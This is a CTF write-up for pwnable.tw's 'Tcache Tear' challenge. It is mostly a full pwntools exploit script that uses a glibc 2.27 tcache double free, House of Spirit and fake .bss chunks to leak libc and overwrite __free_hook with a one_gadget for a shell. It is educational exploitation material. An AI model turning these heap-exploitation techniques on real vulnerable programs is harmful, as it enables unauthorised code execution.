[pwnable.tw]Tcache Tear
- tcache exploit (glibc 2.27 Ubuntu 18.04)
- Double free bug (DFB) & House of Spirit
- tcache dup
- bss fake chunk
This one was a lot of fun. Using House of Spirit I built a fake chunk, redirected `ptr` to it and freed it; the fake chunk lands in the unsorted bin, so its fd/bk (pointers into main_arena) end up inside the name buffer and can be leaked. Because `free()` also sanity-checks the *next* chunk, a second fake chunk header had to be placed at name + 0x500 beforehand. After that it is a plain tcache dup: overwrite `__free_hook` with a one_gadget.
exploit.py
from pwn import *
# context.log_level = 'debug'
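e = ELF('./tcache_tear')
# The libc pwntools pairs with the binary. The hard-coded libc offsets used
# later in the script only hold for the libc build the remote service runs.
libc = e.libc
# Default target is the remote service (unchanged behaviour); run as
# `python exploit.py LOCAL` to drive a local process instead.
p = process('./tcache_tear') if args.LOCAL else remote('chall.pwnable.tw', 10207)
ru, sa, sla = p.recvuntil, p.sendafter, p.sendlineafter
# Fixed .bss addresses (the binary is assumed to be non-PIE, hence the 0x6020xx range):
#   name - the name buffer the program prints back via the "info" menu entry
#   ptr  - the global `void *ptr` that the "free" menu entry operates on
#   fake - name + 0x500: where the fake "next chunk" header must sit so that a
#          0x500-sized fake chunk starting at `name` passes free()'s next-chunk checks
name = 0x0000000000602050
ptr = 0x0000000000602088
fake = 0x602550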
def malloc(size, data):
    """Menu option 1: allocate `size` bytes and write `data` into the new chunk.

    `size` is sent as its decimal string; `data` is sent verbatim.
    """
    # Answer each prompt in the order the program asks for it.
    for prompt, reply in (('Your choice :', '1'), ('Size:', str(size)), ('Data', data)):
        sa(prompt, reply)
def free():
    """Menu option 2: free the chunk referenced by the global `ptr`.

    The exploit below calls this twice in a row on the same chunk, so the
    binary evidently does not clear `ptr` after freeing (the double free).
    """
    p.sendafter('Your choice :', '2')
def info():
    """Menu option 3: make the program print the name buffer.

    Used once, after the fake chunk at `name` has been freed, to read the
    libc pointer that free() left inside that buffer.
    """
    p.sendafter('Your choice :', '3')
def quit():
    """Menu option 4: exit the program.

    Not used by the exploit; kept for completeness. Note that the name
    shadows the builtin `quit`.
    """
    p.sendafter('Your choice :', '4')
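sa('Name:', 'A')

# --- Stage 1: tcache dup to plant a fake "next chunk" header at name + 0x500 ---
# glibc 2.27's tcache has no double-free check, so freeing the same chunk twice
# puts it in the bin twice; the first malloc then lets us overwrite its next pointer.
malloc(0x80, 'A' * 8)
free()
free()
malloc(0x80, p64(fake))      # first copy: its next pointer now points at `fake`
malloc(0x80, 'B' * 8)        # second copy
# Written at `fake`: size 0x21 for the chunk header there and again 0x20 bytes
# later, so that when the 0x500-sized fake chunk below is freed, free()'s checks
# on the next chunk (and the inuse bit of the one after it) pass.
fakechunk1 = p64(0) + p64(0x21) + p64(0) * 3 + p64(0x21)
malloc(0x80, fakechunk1)     # this allocation returns `fake`

# --- Stage 2: tcache dup to get an allocation at `name`, build a 0x501 fake chunk ---
malloc(0x70, 'C' * 8)
free()
free()
malloc(0x70, p64(name))
malloc(0x70, 'D' * 8)
# Fake chunk header at `name` with size 0x501 (too large for tcache, so free()
# puts it in the unsorted bin). The 8th qword lands at name + 0x38 == ptr and
# repoints `ptr` to name + 0x10, i.e. the user data of the fake chunk.
fakechunk2 = p64(0) + p64(0x501) + p64(0) * 5 + p64(name + 0x10)
malloc(0x70, fakechunk2)
free()                       # free(name + 0x10): fd/bk written into the name buffer
info()                       # prints the name buffer, which now holds a main_arena pointer

# Bytes literals keep the parsing working on both Python 2 and Python 3 pwntools
# (str fill for bytes.ljust raises TypeError on Python 3).
leak = u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
# 0x3ebca0 is presumably the unsorted-bin head (main_arena + 96) of the Ubuntu
# 18.04 glibc 2.27 build; it is specific to that libc.
libc_base = leak - 0x3ebca0
log.info('libc_base : {}'.format(hex(libc_base)))
# Sanity check: a libc base is page aligned. Anything else means the leak or the
# offset does not match this libc; log.error() raises, so we stop before writing
# a bogus address into __free_hook.
if libc_base & 0xfff:
    log.error('libc_base {} is not page aligned; leak {} does not match the expected libc'.format(
        hex(libc_base), hex(leak)))
free_hook = libc_base + libc.symbols['__free_hook']
log.info('__free_hook : {}'.format(hex(free_hook)))
# one_gadget offset for this libc; 0x4f2c5 and 0x10a38c are the other candidates
# if the constraints of this one do not hold when __free_hook fires.
oneshot = libc_base + 0x4f322

# --- Stage 3: tcache dup into __free_hook, then any free() calls the gadget ---
malloc(0x60, 'E' * 8)
free()
free()
malloc(0x60, p64(free_hook))  # next pointer -> __free_hook
malloc(0x60, p64(0))          # second copy of the chunk; contents irrelevant
malloc(0x60, p64(oneshot))    # this allocation returns __free_hook; overwrite it
free()                        # __free_hook(ptr) -> one_gadget
p.interactive()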
Reference
https://github.com/shellphish/how2heap/tree/master/glibc_2.26